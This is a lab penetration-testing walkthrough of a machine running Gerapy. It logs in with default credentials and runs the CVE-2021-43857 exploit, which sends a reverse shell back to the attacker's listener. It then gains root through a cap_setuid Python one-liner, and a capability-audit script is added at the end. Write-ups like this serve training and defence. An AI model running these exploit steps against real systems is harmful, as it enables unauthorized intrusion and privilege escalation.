## Enumeration
## Initial Access
Go to the website at 192.168.188.24:8080.
The site is running [Gerapy](https://github.com/Gerapy/Gerapy).
Authenticate with the default credentials `admin:admin`.
Searchsploit reveals an authenticated RCE, [CVE-2021-43857](https://www.exploit-db.com/exploits/50640), which is why those default credentials matter:
>Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.
![[Pasted image 20250331131718.png]]
```sh
╭─[λ]-[/targets/levram]-[192.168.188.24]
╰─> searchsploit -m 50640
```
The exploit matches the target version:
![[Pasted image 20250331132358.png]]
The exploit needs at least one project to exist: it looks up a project ID to build the URL of the vulnerable endpoint, so create a project in the web UI first:
![[Pasted image 20250331133711.png]]
Execute the payload (`-t`/`-p` point at the Gerapy instance, `-L`/`-P` are the address and port of the netcat listener the script starts itself):
```sh
(exploit) ╭─[λ]-[/targets/levram/exploit]-[192.168.188.24]
╰─> python 50640.py -t 192.168.188.24 -p 8000 -L 192.168.45.231 -P 445
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: hax
[*] Getting the ID of the project to build the URL
[*] Found ID of the project: 1
[*] Setting up a netcat listener
listening on [any] 445 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)
connect to [192.168.45.231] from (UNKNOWN) [192.168.188.24] 48604
bash: cannot set terminal process group (844): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$ whoami
whoami
app
```
Aaaaand we're in.
Took about 30 minutes.
## Privesc
A quick shell improvement:
```sh
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
```
Linpeas flags a 95% privesc vector, a file capability on the Python interpreter:
```
Files with capabilities (limited to 50):
...
/usr/bin/python3.10 cap_setuid=ep
...
```
GTFOBins covers this case under [python](https://gtfobins.github.io/gtfobins/python/):
>If the binary has the Linux `CAP_SETUID` capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
Since `cap_setuid` is in both the permitted and effective sets (`=ep`), any Python code the low-privileged `app` user runs can switch its UID to 0 and spawn a shell:
```sh
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
root
```
Took about 10 minutes.
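As an added check (not part of the original notes and not linpeas' own logic), here is a small POSIX shell audit that parses `getcap -r /` output, flags the capabilities that give root-equivalent access on their own, and prints the `setcap -r` command that remediates each finding. The function names and the sample getcap lines are constructed for illustration; the `python3.10` line mirrors the finding above.

```sh
#!/bin/sh
# Added example, not part of the original notes or of linpeas: audit getcap
# output for file capabilities that let an unprivileged user become root.
# Function names and the sample getcap lines below are constructed for
# illustration; the python3.10 line mirrors the finding on this box.

# Capabilities that on their own give root-equivalent access when set on a
# binary an unprivileged user can run (an interpreter is the worst case,
# because the attacker supplies the code). A "+p"-only set still counts:
# the process can raise a permitted cap into its effective set with capset(2).
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap'

# Constructed sample in both getcap formats: the newer "path caps=flags" and
# the older "path = caps+flags". Paths containing spaces are not handled.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/perl = cap_setuid+ep'

# flag_dangerous_caps: reads getcap lines on stdin and prints
# "<path> <capability>" for every dangerous capability found.
flag_dangerous_caps() {
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        path=${line%% *}                 # text before the first space
        caps=${line#* }                  # text after it
        caps=${caps#= }                  # drop the "= " of the old format
        # split "cap_a,cap_b=eip" / "cap_a+ep" into bare tokens
        for tok in $(printf '%s' "$caps" | tr ',=+' '   '); do
            case " $DANGEROUS_CAPS " in
                *" $tok "*) printf '%s %s\n' "$path" "$tok" ;;
            esac
        done
    done
}

# suggest_fix: turns flagged lines into the command that strips the file
# capability, which is the remediation once the service is confirmed not to
# need it (an interpreter almost never should).
suggest_fix() {
    while read -r path cap; do
        printf 'setcap -r %s   # drops %s\n' "$path" "$cap"
    done
}

# Demo on the constructed sample; pass --live to audit the real filesystem.
printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps | suggest_fix
if [ "${1:-}" = "--live" ]; then
    getcap -r / 2>/dev/null | flag_dangerous_caps | suggest_fix
fi
```

Run it with `--live` on a target to audit the real filesystem (`getcap` comes with the libcap tools). The fix is to drop the capability from the interpreter rather than try to guard it: whatever code an unprivileged user hands to Python runs with that capability, exactly as the one-liner above shows.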
## Lessons Learned
- Just drilling more shit
- Read the exploit code (was a little stuck on the project requirement)